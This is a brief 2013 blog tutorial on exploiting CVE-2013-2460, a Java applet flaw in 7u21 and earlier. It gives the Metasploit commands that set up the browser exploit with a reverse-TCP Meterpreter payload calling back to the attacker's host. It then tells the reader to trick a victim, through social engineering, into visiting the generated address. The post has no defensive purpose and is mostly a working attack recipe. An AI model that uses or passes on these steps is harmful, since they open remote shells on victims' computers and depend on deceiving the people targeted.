Thursday, August 15, 2013

Exploiting CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method Tutorial


CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.


Exploiting CVE-2013-2460 with metasploit

Code:
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]
msf exploit(java_jre17_provider_skeleton) > set uripath /
msf exploit(java_jre17_provider_skeleton) > exploit

Now we do a bit of Social engineering to send the address generated by the metasploit to make the session meterpreter.



Source : Link

No comments:

Post a Comment